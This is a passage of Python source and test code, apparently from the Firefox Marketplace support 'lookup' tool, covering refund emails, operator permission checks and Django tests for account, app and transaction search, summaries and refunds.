@register.function
@jinja2.contextfunction
def is_operator(context):
    """True when the current user belongs to the 'Operators' group."""
    user_groups = context['request'].groups
    return any(group.name == 'Operators' for group in user_groups)
########NEW FILE########
__FILENAME__ = models
########NEW FILE########
__FILENAME__ = tasks
from amo.utils import send_mail_jinja
from celeryutils import task
@task
def email_buyer_refund_pending(contrib):
    """Email the buyer that their refund request for the contribution's
    add-on is now being processed."""
    # The original ended the call with a stray trailing comma, wrapping
    # it in a throwaway one-element tuple; removed.
    send_mail_jinja('Your refund request for %s is now being processed'
                    % contrib.addon.name,
                    'lookup/emails/refund-pending.txt',
                    {'name': contrib.addon.name},
                    recipient_list=[contrib.user.email])
@task
def email_buyer_refund_approved(contrib):
    """Email the buyer that their refund request for the contribution's
    add-on has been approved."""
    # The original ended the call with a stray trailing comma, wrapping
    # it in a throwaway one-element tuple; removed.
    send_mail_jinja('Your refund request for %s has been approved!'
                    % contrib.addon.name,
                    'lookup/emails/refund-approved.txt',
                    {'name': contrib.addon.name},
                    recipient_list=[contrib.user.email])
########NEW FILE########
__FILENAME__ = test_forms
from nose.tools import eq_
import amo.tests
from mkt.lookup.forms import TransactionSearchForm, TransactionRefundForm
class TestTransactionSearchForm(amo.tests.TestCase):
    """Smoke tests for TransactionSearchForm."""

    def test_basic(self):
        """Test the form doesn't crap out."""
        self.check_valid({'q': 12345}, True)

    def test_str_number(self):
        # String input is just as valid as an int.
        self.check_valid({'q': '12345'})

    def check_valid(self, data, valid=True):
        # Helper: assert the form's validity matches `valid`.
        form = TransactionSearchForm(data)
        eq_(form.is_valid(), valid)
class TestTransactionRefundForm(amo.tests.TestCase):
    """The `fake` field must track settings.BANGO_FAKE_REFUNDS."""

    def test_not_fake(self):
        with self.settings(BANGO_FAKE_REFUNDS=False):
            assert 'fake' not in TransactionRefundForm().fields.keys()

    def test_fake(self):
        with self.settings(BANGO_FAKE_REFUNDS=True):
            assert 'fake' in TransactionRefundForm().fields.keys()
########NEW FILE########
__FILENAME__ = test_views
import json
from datetime import datetime, timedelta
from decimal import Decimal
from django.conf import settings
from django.contrib.messages.storage.fallback import FallbackStorage
from django.core import mail
from django.core.urlresolvers import reverse
from django.test.client import RequestFactory
from django.utils.encoding import smart_str
import mock
from babel import numbers
from curling.lib import HttpClientError
from nose.exc import SkipTest
from nose.tools import eq_, ok_
from pyquery import PyQuery as pq
from slumber import exceptions
import amo
import amo.tests
from abuse.models import AbuseReport
from access.models import Group, GroupUser
from addons.models import Addon, AddonUser
from amo.tests import (addon_factory, app_factory, ESTestCase,
req_factory_factory, TestCase)
from constants.payments import PROVIDER_BANGO, PROVIDER_BOKU
from devhub.models import ActivityLog
from mkt.constants.payments import COMPLETED, FAILED, PENDING, REFUND_STATUSES
from mkt.developers.models import (AddonPaymentAccount, PaymentAccount,
SolitudeSeller)
from mkt.developers.providers import get_provider
from mkt.developers.tests.test_views_payments import (setup_payment_account,
TEST_PACKAGE_ID)
from mkt.lookup.views import (_transaction_summary, app_summary,
transaction_refund, user_delete, user_summary)
from mkt.site.fixtures import fixture
from mkt.webapps.models import Webapp
from mkt.prices.models import AddonPaymentData, Refund
from stats.models import Contribution
from users.models import UserProfile
class SummaryTest(TestCase):
    """Shared helpers for the lookup summary-page tests."""

    def add_payment_accounts(self, providers, app=None):
        # Create a PaymentAccount plus an app link for every provider id,
        # all hanging off a single SolitudeSeller for self.user.
        if not app:
            app = self.app
        user = self.user
        seller = SolitudeSeller.objects.create(user=user, uuid='seller-uid')
        for provider in providers:
            uri = 'seller-{p}'.format(p=provider)
            payment = PaymentAccount.objects.create(
                user=user, solitude_seller=seller,
                provider=provider,
                seller_uri=uri, uri=uri,
                agreed_tos=True, account_id='not-important')
            AddonPaymentAccount.objects.create(addon=app,
                product_uri='product-{p}'.format(p=provider),
                account_uri=payment.uri,
                payment_account=payment)
        app.save()

    def verify_bango_boku_portals(self, app, response):
        # Assert both provider portal links are rendered for the app.
        bango = pq(response.content)('[data-provider-name=bango]')
        heading = pq('dt', bango).text()
        assert 'Bango' in heading, heading
        assert unicode(app.name) in heading, heading
        eq_(pq('dd a', bango).attr('href'),
            get_provider(name='bango').get_portal_url(app.app_slug))

        boku = pq(response.content)('[data-provider-name=boku]')
        heading = pq('dt', boku).text()
        assert 'Boku' in heading, heading
        assert unicode(app.name) in heading, heading
        eq_(pq('dd a', boku).attr('href'),
            get_provider(name='boku').get_portal_url(app.app_slug))
@mock.patch.object(settings, 'TASK_USER_ID', 999)
class TestAcctSummary(SummaryTest):
    """Tests for the user-account summary page (lookup.user_summary)."""

    fixtures = fixture('user_support_staff', 'user_999', 'webapp_337141',
                       'user_operator')

    def setUp(self):
        super(TestAcctSummary, self).setUp()
        self.user = UserProfile.objects.get(username='31337')  # steamcube
        self.steamcube = Addon.objects.get(pk=337141)
        self.otherapp = app_factory(app_slug='otherapp')
        self.reg_user = UserProfile.objects.get(email='[email protected]')
        self.summary_url = reverse('lookup.user_summary', args=[self.user.pk])
        self.login(UserProfile.objects.get(username='support_staff'))

    def buy_stuff(self, contrib_type):
        """Create three contributions for self.user: 2x USD, 1x 'GBR'.

        NOTE(review): 'GBR' looks like a typo for the ISO currency code
        'GBP', but the summary groups by the literal currency string, so
        the assertions below remain self-consistent — confirm intent.
        """
        for i in range(3):
            if i == 1:
                curr = 'GBR'
            else:
                curr = 'USD'
            amount = Decimal('2.00')
            Contribution.objects.create(addon=self.steamcube,
                                        type=contrib_type,
                                        currency=curr,
                                        amount=amount,
                                        user_id=self.user.pk)

    def summary(self, expected_status=200):
        """GET the summary page and assert the status code."""
        res = self.client.get(self.summary_url)
        eq_(res.status_code, expected_status)
        return res

    def payment_data(self):
        """Canned AddonPaymentData field values used by several tests."""
        return {'full_name': 'Ed Peabody Jr.',
                'business_name': 'Mr. Peabody',
                'phone': '(1) 773-111-2222',
                'address_one': '1111 W Leland Ave',
                'address_two': 'Apt 1W',
                'city': 'Chicago',
                'post_code': '60640',
                'country': 'USA',
                'state': 'Illinois'}

    def test_home_auth(self):
        self.client.logout()
        res = self.client.get(reverse('lookup.home'))
        self.assertLoginRedirects(res, reverse('lookup.home'))

    def test_summary_auth(self):
        self.client.logout()
        res = self.client.get(self.summary_url)
        self.assertLoginRedirects(res, self.summary_url)

    def test_home(self):
        res = self.client.get(reverse('lookup.home'))
        self.assertNoFormErrors(res)
        eq_(res.status_code, 200)

    def test_basic_summary(self):
        res = self.summary()
        eq_(res.context['account'].pk, self.user.pk)

    @mock.patch.object(settings, 'PAYMENT_PROVIDERS', ['bango', 'boku'])
    def test_multiple_payment_accounts(self):
        app = self.steamcube
        self.add_payment_accounts([PROVIDER_BANGO, PROVIDER_BOKU],
                                  app=app)
        res = self.summary()
        self.verify_bango_boku_portals(app, res)

    def test_app_counts(self):
        self.buy_stuff(amo.CONTRIB_PURCHASE)
        sm = self.summary().context['app_summary']
        eq_(sm['app_total'], 3)
        # Two USD purchases of 2.00 each, one 'GBR' purchase of 2.00.
        eq_(sm['app_amount']['USD'], 4.0)
        eq_(sm['app_amount']['GBR'], 2.0)

    def test_requested_refunds(self):
        contrib = Contribution.objects.create(type=amo.CONTRIB_PURCHASE,
                                              user_id=self.user.pk,
                                              addon=self.steamcube,
                                              currency='USD',
                                              amount='0.99')
        Refund.objects.create(contribution=contrib, user=self.user)
        res = self.summary()
        eq_(res.context['refund_summary']['requested'], 1)
        eq_(res.context['refund_summary']['approved'], 0)

    def test_approved_refunds(self):
        contrib = Contribution.objects.create(type=amo.CONTRIB_PURCHASE,
                                              user_id=self.user.pk,
                                              addon=self.steamcube,
                                              currency='USD',
                                              amount='0.99')
        Refund.objects.create(contribution=contrib,
                              status=amo.REFUND_APPROVED_INSTANT,
                              user=self.user)
        res = self.summary()
        eq_(res.context['refund_summary']['requested'], 1)
        eq_(res.context['refund_summary']['approved'], 1)

    def test_app_created(self):
        res = self.summary()
        # Number of apps/add-ons belonging to this user.
        eq_(len(res.context['user_addons']), 1)

    def test_paypal_ids(self):
        self.user.addons.update(paypal_id='[email protected]')
        res = self.summary()
        eq_(list(res.context['paypal_ids']), [u'[email protected]'])

    def test_no_paypal(self):
        self.user.addons.update(paypal_id='')
        res = self.summary()
        eq_(list(res.context['paypal_ids']), [])

    def test_payment_data(self):
        payment_data = self.payment_data()
        AddonPaymentData.objects.create(addon=self.steamcube,
                                        **payment_data)
        res = self.summary()
        pd = res.context['payment_data'][0]
        for key, value in payment_data.iteritems():
            eq_(pd[key], value)

    def test_no_payment_data(self):
        res = self.summary()
        eq_(len(res.context['payment_data']), 0)

    def test_no_duplicate_payment_data(self):
        # Same payment data on two of the user's apps must be shown once.
        role = AddonUser.objects.create(user=self.user,
                                        addon=self.otherapp,
                                        role=amo.AUTHOR_ROLE_DEV)
        self.otherapp.addonuser_set.add(role)
        payment_data = self.payment_data()
        AddonPaymentData.objects.create(addon=self.steamcube,
                                        **payment_data)
        AddonPaymentData.objects.create(addon=self.otherapp,
                                        **payment_data)
        res = self.summary()
        eq_(len(res.context['payment_data']), 1)
        pd = res.context['payment_data'][0]
        for key, value in payment_data.iteritems():
            eq_(pd[key], value)

    def test_operator_app_lookup_only(self):
        # Operators only get the app search; the account select is hidden.
        GroupUser.objects.create(
            group=Group.objects.get(name='Operators'),
            user=UserProfile.objects.get(username='support_staff'))
        res = self.client.get(reverse('lookup.home'))
        doc = pq(res.content)
        eq_(doc('#app-search-form select').length, 0)

    def test_delete_user(self):
        staff = UserProfile.objects.get(username='support_staff')
        req = req_factory_factory(
            reverse('lookup.user_delete', args=[self.user.id]), user=staff,
            post=True, data={'delete_reason': 'basketball reasons'})

        r = user_delete(req, self.user.id)
        self.assert3xx(r, reverse('lookup.user_summary', args=[self.user.id]))

        # Test data.
        assert UserProfile.objects.get(id=self.user.id).deleted
        eq_(staff, ActivityLog.objects.for_user(self.user).filter(
            action=amo.LOG.DELETE_USER_LOOKUP.id)[0].user)

        # Test frontend.
        req = req_factory_factory(
            reverse('lookup.user_summary', args=[self.user.id]), user=staff)
        r = user_summary(req, self.user.id)
        eq_(r.status_code, 200)
        doc = pq(r.content)
        eq_(doc('#delete-user dd:eq(1)').text(), 'basketball reasons')
class TestBangoRedirect(TestCase):
    """Tests for the redirect into the Bango merchant portal."""

    fixtures = fixture('user_support_staff', 'user_999', 'webapp_337141',
                       'user_operator')

    def setUp(self):
        super(TestBangoRedirect, self).setUp()
        self.user = UserProfile.objects.get(username='31337')  # steamcube
        self.steamcube = Addon.objects.get(pk=337141)
        self.otherapp = app_factory(app_slug='otherapp')
        self.reg_user = UserProfile.objects.get(email='[email protected]')
        self.summary_url = reverse('lookup.user_summary', args=[self.user.pk])
        self.login(UserProfile.objects.get(username='support_staff'))
        self.steamcube.update(premium_type=amo.ADDON_PREMIUM)
        self.account = setup_payment_account(self.steamcube, self.user)
        self.portal_url = reverse('lookup.bango_portal_from_package',
            args=[self.account.payment_account.account_id])
        self.authentication_token = u'D0A44686-D4A3-4B2F-9BEB-5E4975E35192'

    @mock.patch('mkt.developers.views_payments.client.api')
    def test_bango_portal_redirect(self, api):
        # A successful Bango login must redirect with the token and email
        # embedded in the target URL.
        api.bango.login.post.return_value = {
            'person_id': 600925,
            'email_address': u'[email protected]',
            'authentication_token': self.authentication_token,
        }
        res = self.client.get(self.portal_url)
        eq_(res.status_code, 302)
        eq_(api.bango.login.post.call_args[0][0]['packageId'],
            int(TEST_PACKAGE_ID))
        redirect_url = res['Location']
        assert self.authentication_token in redirect_url, redirect_url
        assert 'emailAddress=admin%40place.com' in redirect_url, redirect_url

    @mock.patch('mkt.developers.views_payments.client.api')
    def test_bango_portal_redirect_api_error(self, api):
        # API failures bounce back to the lookup home with a message.
        message = 'Something went wrong.'
        error = {'__all__': [message]}
        api.bango.login.post.side_effect = HttpClientError(content=error)
        res = self.client.get(self.portal_url, follow=True)
        eq_(res.redirect_chain, [('http://testserver/lookup/', 302)])
        ok_(message in [msg.message for msg in res.context['messages']][0])

    @mock.patch('mkt.developers.views_payments.client.api')
    def test_bango_portal_redirect_role_error(self, api):
        # A non-staff user (the app owner) must be denied.
        self.login(self.user)
        res = self.client.get(self.portal_url)
        eq_(res.status_code, 403)
class SearchTestMixin(object):
    """Shared behaviour for the JSON search-endpoint tests.

    Hosts must set ``self.url`` and provide an authenticated test client.
    """

    def search(self, expect_results=True, **data):
        """GET ``self.url`` with *data* and return the decoded JSON body."""
        response = self.client.get(self.url, data)
        payload = json.loads(response.content)
        if expect_results:
            assert len(payload['results']), 'should be more than 0 results'
        return payload

    def test_auth_required(self):
        """Anonymous requests are redirected to the login page."""
        self.client.logout()
        response = self.client.get(self.url)
        self.assertLoginRedirects(response, self.url)
class TestAcctSearch(TestCase, SearchTestMixin):
    """Tests for the user-account JSON search endpoint."""

    fixtures = fixture('user_10482', 'user_support_staff', 'user_operator')

    def setUp(self):
        super(TestAcctSearch, self).setUp()
        self.url = reverse('lookup.user_search')
        self.user = UserProfile.objects.get(username='clouserw')
        self.login(UserProfile.objects.get(username='support_staff'))

    def verify_result(self, data):
        """Assert the first search result matches ``self.user``."""
        eq_(data['results'][0]['name'], self.user.username)
        eq_(data['results'][0]['display_name'], self.user.display_name)
        eq_(data['results'][0]['email'], self.user.email)
        eq_(data['results'][0]['id'], self.user.pk)
        eq_(data['results'][0]['url'], reverse('lookup.user_summary',
                                               args=[self.user.pk]))

    def test_by_username(self):
        self.user.update(username='newusername')
        data = self.search(q='newus')
        self.verify_result(data)

    def test_by_username_with_dashes(self):
        self.user.update(username='kr-raj')
        data = self.search(q='kr-raj')
        self.verify_result(data)

    def test_by_display_name(self):
        self.user.update(display_name='Kumar McMillan')
        data = self.search(q='mcmill')
        self.verify_result(data)

    def test_by_id(self):
        data = self.search(q=self.user.pk)
        self.verify_result(data)

    def test_by_email(self):
        self.user.update(email='[email protected]')
        data = self.search(q='fonzi')
        self.verify_result(data)

    @mock.patch('mkt.constants.lookup.SEARCH_LIMIT', 2)
    @mock.patch('mkt.constants.lookup.MAX_RESULTS', 3)
    def test_all_results(self):
        for x in range(4):
            name = 'chr' + str(x)
            UserProfile.objects.create(username=name, name=name,
                                       email=name + '@gmail.com')

        # Test not at search limit.
        data = self.search(q='clouserw')
        eq_(len(data['results']), 1)

        # Test search limit.
        data = self.search(q='chr')
        eq_(len(data['results']), 2)

        # Test maximum search result (all_results bypasses SEARCH_LIMIT
        # but is still capped at MAX_RESULTS).
        data = self.search(q='chr', all_results=True)
        eq_(len(data['results']), 3)
class TestTransactionSearch(TestCase):
    """Tests for the transaction-lookup search redirect."""

    fixtures = fixture('user_support_staff', 'user_999', 'user_operator')

    def setUp(self):
        # NOTE(review): unlike sibling classes this setUp does not call
        # super().setUp() — confirm whether that is intentional.
        self.uuid = 45
        self.url = reverse('lookup.transaction_search')
        self.client.login(username='[email protected]',
                          password='password')

    def test_redirect(self):
        # Searching a transaction id redirects straight to its summary.
        r = self.client.get(self.url, {'q': self.uuid})
        self.assert3xx(r, reverse('lookup.transaction_summary',
                                  args=[self.uuid]))

    def test_no_perm(self):
        # Neither a regular user nor an operator may search transactions.
        self.client.login(username='[email protected]',
                          password='password')
        r = self.client.get(self.url, {'q': self.uuid})
        eq_(r.status_code, 403)

        assert self.client.login(username='[email protected]',
                                 password='password')
        r = self.client.get(self.url, {'q': self.uuid})
        eq_(r.status_code, 403)
class TestTransactionSummary(TestCase):
    """Tests for the transaction summary page and helper."""

    fixtures = fixture('user_support_staff', 'user_999', 'user_operator')

    def setUp(self):
        # NOTE(review): no super().setUp() call here, unlike most sibling
        # classes — confirm whether that is intentional.
        self.uuid = 'some:uuid'
        self.transaction_id = 'some:tr'
        self.seller_uuid = 456
        self.related_tx_uuid = 789
        self.user = UserProfile.objects.get(pk=999)

        self.app = addon_factory(type=amo.ADDON_WEBAPP)
        self.contrib = Contribution.objects.create(
            addon=self.app, uuid=self.uuid, user=self.user,
            transaction_id=self.transaction_id)

        self.url = reverse('lookup.transaction_summary', args=[self.uuid])
        self.client.login(username='[email protected]',
                          password='password')

    @mock.patch.object(settings, 'TASK_USER_ID', 999)
    def create_test_refund(self):
        """Attach a pending refund contribution to ``self.contrib``."""
        refund_contrib = Contribution.objects.create(
            addon=self.app, related=self.contrib, type=amo.CONTRIB_REFUND,
            transaction_id='testtransactionid', user=self.user)
        refund_contrib.enqueue_refund(amo.REFUND_PENDING, self.user)

    def test_transaction_summary(self):
        data = _transaction_summary(self.uuid)

        eq_(data['is_refundable'], False)
        eq_(data['contrib'].pk, self.contrib.pk)

    @mock.patch('mkt.lookup.views.client')
    def test_refund_status(self, solitude):
        solitude.api.bango.refund.status.get.return_value = {'status': PENDING}

        self.create_test_refund()
        data = _transaction_summary(self.uuid)

        eq_(data['refund_status'], REFUND_STATUSES[PENDING])

    @mock.patch('mkt.lookup.views.client')
    def test_is_refundable(self, solitude):
        # A purchase with no refund yet is refundable; once a refund
        # exists it no longer is.
        solitude.api.bango.refund.status.get.return_value = {'status': PENDING}

        self.contrib.update(type=amo.CONTRIB_PURCHASE)
        data = _transaction_summary(self.uuid)
        eq_(data['contrib'].pk, self.contrib.pk)
        eq_(data['is_refundable'], True)

        self.create_test_refund()
        data = _transaction_summary(self.uuid)
        eq_(data['is_refundable'], False)

    @mock.patch('mkt.lookup.views.client')
    def test_200(self, solitude):
        r = self.client.get(self.url)
        eq_(r.status_code, 200)

    def test_no_perm_403(self):
        # Neither regular users nor operators may view the summary.
        self.client.login(username='[email protected]',
                          password='password')
        r = self.client.get(self.url)
        eq_(r.status_code, 403)

        assert self.client.login(username='[email protected]',
                                 password='password')
        r = self.client.get(self.url)
        eq_(r.status_code, 403)

    def test_no_transaction_404(self):
        r = self.client.get(reverse('lookup.transaction_summary', args=[999]))
        eq_(r.status_code, 404)
@mock.patch.object(settings, 'TASK_USER_ID', 999)
class TestTransactionRefund(TestCase):
    """Tests for the transaction refund view (lookup.transaction_refund)."""

    fixtures = fixture('user_support_staff', 'user_999')

    def setUp(self):
        self.uuid = 'paymentuuid'
        self.refund_uuid = 'refunduuid'
        self.summary_url = reverse('lookup.transaction_summary',
                                   args=[self.uuid])
        self.url = reverse('lookup.transaction_refund', args=[self.uuid])
        self.app = app_factory()
        self.user = UserProfile.objects.get(username='regularuser')
        AddonUser.objects.create(addon=self.app, user=self.user)

        self.req = self.request({'refund_reason': 'text'})
        self.contrib = Contribution.objects.create(
            addon=self.app, user=self.user, uuid=self.uuid,
            type=amo.CONTRIB_PURCHASE, amount=1, transaction_id='123')
        # Fix Django 1.4 RequestFactory bug with MessageMiddleware.
        setattr(self.req, 'session', 'session')
        messages = FallbackStorage(self.req)
        setattr(self.req, '_messages', messages)
        self.login(self.req.user)

    def bango_ret(self, status):
        """Canned Solitude/Bango refund-POST response with *status*."""
        return {
            'status': status,
            'transaction': 'transaction_uri',
            'uuid': 'some:uid'
        }

    def request(self, data):
        """Build a POST request to the refund URL as support staff."""
        req = RequestFactory().post(self.url, data)
        req.user = req.amo_user = UserProfile.objects.get(
            username='support_staff')
        req.groups = req.amo_user.groups.all()
        return req

    def refund_tx_ret(self):
        """Canned Solitude GET response for the refund transaction."""
        return {'uuid': self.refund_uuid}

    @mock.patch('mkt.lookup.views.client')
    def test_fake_refund_ignored(self, client):
        # 'fake' in the POST is ignored when BANGO_FAKE_REFUNDS is off.
        req = self.request({'refund_reason': 'text', 'fake': 'OK'})
        with self.settings(BANGO_FAKE_REFUNDS=False):
            transaction_refund(req, self.uuid)
        client.api.bango.refund.post.assert_called_with(
            {'uuid': '123', 'manual': False})

    @mock.patch('mkt.lookup.views.client')
    def test_manual_refund(self, client):
        req = self.request({'refund_reason': 'text', 'manual': True})
        transaction_refund(req, self.uuid)
        client.api.bango.refund.post.assert_called_with(
            {'uuid': '123', 'manual': True})

    @mock.patch('mkt.lookup.views.client')
    def test_fake_refund(self, client):
        req = self.request({'refund_reason': 'text', 'fake': 'OK'})
        with self.settings(BANGO_FAKE_REFUNDS=True):
            transaction_refund(req, self.uuid)
        client.api.bango.refund.post.assert_called_with({
            'fake_response_status': {'responseCode': 'OK'},
            'uuid': '123', 'manual': False})

    @mock.patch('mkt.lookup.views.client')
    def test_refund_success(self, solitude):
        solitude.api.bango.refund.post.return_value = self.bango_ret(PENDING)
        solitude.get.return_value = self.refund_tx_ret()

        # Do refund.
        res = transaction_refund(self.req, self.uuid)
        refund = Refund.objects.filter(contribution__addon=self.app)
        refund_contribs = self.contrib.get_refund_contribs()

        # Check Refund created.
        assert refund.exists()
        eq_(refund[0].status, amo.REFUND_PENDING)
        assert self.req.POST['refund_reason'] in refund[0].refund_reason

        # Check refund Contribution created.
        eq_(refund_contribs.exists(), True)
        eq_(refund_contribs[0].refund, refund[0])
        eq_(refund_contribs[0].related, self.contrib)
        eq_(refund_contribs[0].amount, -self.contrib.amount)

        self.assert3xx(res, self.summary_url)

    @mock.patch('mkt.lookup.views.client')
    def test_refund_failed(self, solitude):
        solitude.api.bango.refund.post.return_value = self.bango_ret(FAILED)

        res = transaction_refund(self.req, self.uuid)

        # Check no refund Contributions created.
        assert not self.contrib.get_refund_contribs().exists()
        self.assert3xx(res, self.summary_url)

    def test_cant_refund(self):
        # Only completed purchases may be refunded.
        self.contrib.update(type=amo.CONTRIB_PENDING)
        resp = self.client.post(self.url, {'refund_reason': 'text'})
        eq_(resp.status_code, 404)

    @mock.patch('mkt.lookup.views.client')
    def test_already_refunded(self, solitude):
        # Refunding twice must not create additional contributions.
        solitude.api.bango.refund.post.return_value = self.bango_ret(PENDING)
        solitude.get.return_value = self.refund_tx_ret()
        res = transaction_refund(self.req, self.uuid)
        refund_count = Contribution.objects.all().count()

        # Check no refund Contributions created.
        res = self.client.post(self.url, {'refund_reason': 'text'})
        assert refund_count == Contribution.objects.all().count()
        self.assert3xx(res, reverse('lookup.transaction_summary',
                                    args=[self.uuid]))

    @mock.patch('mkt.lookup.views.client')
    def test_refund_slumber_error(self, solitude):
        # Solitude client/server errors are handled without creating data.
        for exception in (exceptions.HttpClientError,
                          exceptions.HttpServerError):
            solitude.api.bango.refund.post.side_effect = exception
            res = transaction_refund(self.req, self.uuid)

            # Check no refund Contributions created.
            assert not self.contrib.get_refund_contribs().exists()
            self.assert3xx(res, self.summary_url)

    @mock.patch('mkt.lookup.views.client')
    def test_redirect(self, solitude):
        solitude.api.bango.refund.post.return_value = self.bango_ret(PENDING)
        solitude.get.return_value = self.refund_tx_ret()

        res = self.client.post(self.url, {'refund_reason': 'text'})
        self.assert3xx(res, reverse('lookup.transaction_summary',
                                    args=[self.uuid]))

    @mock.patch('mkt.lookup.views.client')
    @mock.patch.object(settings, 'SEND_REAL_EMAIL', True)
    def test_refund_pending_email(self, solitude):
        solitude.api.bango.refund.post.return_value = self.bango_ret(PENDING)
        solitude.get.return_value = self.refund_tx_ret()

        transaction_refund(self.req, self.uuid)
        eq_(len(mail.outbox), 1)
        assert self.app.name.localized_string in smart_str(mail.outbox[0].body)

    @mock.patch('mkt.lookup.views.client')
    @mock.patch.object(settings, 'SEND_REAL_EMAIL', True)
    def test_refund_completed_email(self, solitude):
        solitude.api.bango.refund.post.return_value = self.bango_ret(COMPLETED)
        solitude.get.return_value = self.refund_tx_ret()

        transaction_refund(self.req, self.uuid)
        eq_(len(mail.outbox), 1)
        assert self.app.name.localized_string in smart_str(mail.outbox[0].body)

    @mock.patch('mkt.lookup.views.client')
    def test_403_reg_user(self, solitude):
        # App owners without staff rights may not issue refunds.
        solitude.api.bango.refund.post.return_value = self.bango_ret(PENDING)
        solitude.get.return_value = self.refund_tx_ret()

        self.login(self.user)
        res = self.client.post(self.url, {'refund_reason': 'text'})
        eq_(res.status_code, 403)
class TestAppSearch(ESTestCase, SearchTestMixin):
    """Tests for the Elasticsearch-backed app JSON search endpoint."""

    fixtures = fixture('user_support_staff', 'user_999', 'webapp_337141',
                       'user_operator')

    def setUp(self):
        super(TestAppSearch, self).setUp()
        self.url = reverse('lookup.app_search')
        self.app = Addon.objects.get(pk=337141)
        assert self.client.login(username='[email protected]',
                                 password='password')

    def verify_result(self, data):
        """Assert the first search result matches ``self.app``."""
        eq_(data['results'][0]['name'], self.app.name.localized_string)
        eq_(data['results'][0]['id'], self.app.pk)
        eq_(data['results'][0]['url'], reverse('lookup.app_summary',
                                               args=[self.app.pk]))

    def test_by_name_part(self):
        self.app.name = 'This is Steamcube'
        self.app.save()
        self.refresh('webapp')
        data = self.search(q='steamcube')
        self.verify_result(data)

    def test_by_name_unreviewed(self):
        # Just the same as the above test, but with an unreviewed app.
        self.app.status = amo.STATUS_UNREVIEWED
        self.test_by_name_part()

    def test_by_deleted_app(self):
        # NOTE(review): the query string 'something' does not obviously
        # match the fixture app's name — confirm what the deleted-app
        # search path matches on here.
        self.app.delete()
        self.refresh('webapp')
        data = self.search(q='something')
        self.verify_result(data)

    def test_multiword(self):
        self.app.name = 'Firefox Marketplace'
        self.app.save()
        self.refresh('webapp')
        data = self.search(q='Firefox Marketplace')
        self.verify_result(data)

    def test_by_stem_name(self):
        # Stemming: 'instigate' should match 'Instigated'.
        self.app.name = 'Instigated'
        self.app.save()
        self.refresh('webapp')
        data = self.search(q='instigate')
        self.verify_result(data)

    def test_by_guid(self):
        self.app.update(guid='abcdef')
        data = self.search(q=self.app.guid)
        self.verify_result(data)

    def test_by_id(self):
        data = self.search(q=self.app.pk)
        self.verify_result(data)

    def test_operator(self):
        # Operators are allowed to use the app search.
        assert self.client.login(username='[email protected]',
                                 password='password')
        data = self.search(q=self.app.pk)
        self.verify_result(data)

    @mock.patch('mkt.constants.lookup.SEARCH_LIMIT', 2)
    @mock.patch('mkt.constants.lookup.MAX_RESULTS', 3)
    def test_all_results(self):
        for x in range(4):
            addon_factory(name='chr' + str(x), type=amo.ADDON_WEBAPP)
        self.refresh('webapp')

        # Test search limit.
        data = self.search(q='chr')
        eq_(len(data['results']), 2)

        # Test maximum search result (all_results bypasses SEARCH_LIMIT
        # but is still capped at MAX_RESULTS).
        data = self.search(q='chr', all_results=True)
        eq_(len(data['results']), 3)
class AppSummaryTest(SummaryTest):
    """Base class for the app summary page tests.

    Subclasses call ``_setUp()`` from their own ``setUp`` to load the
    fixture app and log in as support staff.
    """

    fixtures = fixture('prices', 'webapp_337141', 'user_support_staff')

    def _setUp(self):
        """Load the fixture app/user and authenticate as support staff."""
        self.app = Addon.objects.get(pk=337141)
        self.url = reverse('lookup.app_summary', args=[self.app.pk])
        self.user = UserProfile.objects.get(username='31337')
        assert self.client.login(username='[email protected]',
                                 password='password')

    def summary(self, expected_status=200):
        """GET the app summary page and assert the status code."""
        response = self.client.get(self.url)
        eq_(response.status_code, expected_status)
        return response
class TestAppSummary(AppSummaryTest):
    """Tests for the app summary page (lookup.app_summary)."""

    fixtures = fixture('prices', 'user_admin', 'user_support_staff',
                       'webapp_337141', 'user_operator')

    def setUp(self):
        super(TestAppSummary, self).setUp()
        self._setUp()

    def test_app_deleted(self):
        self.app.delete()
        self.summary()

    def test_packaged_app_deleted(self):
        self.app.update(is_packaged=True)
        ver = amo.tests.version_factory(addon=self.app)
        amo.tests.file_factory(version=ver)
        self.app.delete()
        self.summary()

    def test_authors(self):
        user = UserProfile.objects.get(username='31337')
        role = AddonUser.objects.create(user=user,
                                        addon=self.app,
                                        role=amo.AUTHOR_ROLE_DEV)
        self.app.addonuser_set.add(role)
        res = self.summary()
        eq_(res.context['authors'][0].display_name, user.display_name)

    def test_visible_authors(self):
        # Only dev and owner roles are listed; viewer/support are hidden.
        AddonUser.objects.all().delete()
        for role in (amo.AUTHOR_ROLE_DEV,
                     amo.AUTHOR_ROLE_OWNER,
                     amo.AUTHOR_ROLE_VIEWER,
                     amo.AUTHOR_ROLE_SUPPORT):
            user = UserProfile.objects.create(username=role)
            role = AddonUser.objects.create(user=user,
                                            addon=self.app,
                                            role=role)
            self.app.addonuser_set.add(role)

        res = self.summary()
        eq_(sorted([u.username for u in res.context['authors']]),
            [str(amo.AUTHOR_ROLE_DEV), str(amo.AUTHOR_ROLE_OWNER)])

    def test_details(self):
        res = self.summary()
        eq_(res.context['app'].manifest_url, self.app.manifest_url)
        eq_(res.context['app'].premium_type, amo.ADDON_FREE)
        eq_(res.context['price'], None)

    def test_price(self):
        self.make_premium(self.app)
        res = self.summary()
        eq_(res.context['price'], self.app.premium.price)

    def test_abuse_reports(self):
        for i in range(2):
            AbuseReport.objects.create(addon=self.app,
                                       ip_address='10.0.0.1',
                                       message='spam and porn everywhere')
        res = self.summary()
        eq_(res.context['abuse_reports'], 2)

    def test_permissions(self):
        raise SkipTest('we do not support permissions yet')

    def test_version_history_non_packaged(self):
        res = self.summary()
        eq_(pq(res.content)('section.version-history').length, 0)

    def test_version_history_packaged(self):
        self.app.update(is_packaged=True)
        self.version = self.app.current_version
        self.file = self.version.all_files[0]
        self.file.update(filename='mozball.zip')

        res = self.summary()
        eq_(pq(res.content)('section.version-history').length, 1)
        assert 'mozball.zip' in pq(res.content)(
            'section.version-history a.download').attr('href')

    def test_edit_link_staff(self):
        res = self.summary()
        eq_(pq(res.content)('.shortcuts li').length, 4)
        eq_(pq(res.content)('.shortcuts li').eq(3).text(), 'Edit Listing')

    def test_operator_200(self):
        assert self.client.login(username='[email protected]',
                                 password='password')
        res = self.client.get(self.url)
        eq_(res.status_code, 200)

    def test_priority_button_available(self):
        res = self.summary()
        eq_(pq(res.content)('section.column-b button.button').attr('name'),
            'prioritize')
        eq_(pq(res.content)('section.column-b button.button').text(),
            'Prioritize Review?')

    def test_priority_button_already_prioritized(self):
        # NOTE(review): the selector 'button.button,disabled' uses the CSS
        # "or" combinator (matches button.button OR <disabled> elements);
        # it likely was meant to be 'button.button.disabled' or
        # 'button.button[disabled]' — confirm against the template.
        self.app.update(priority_review=True)
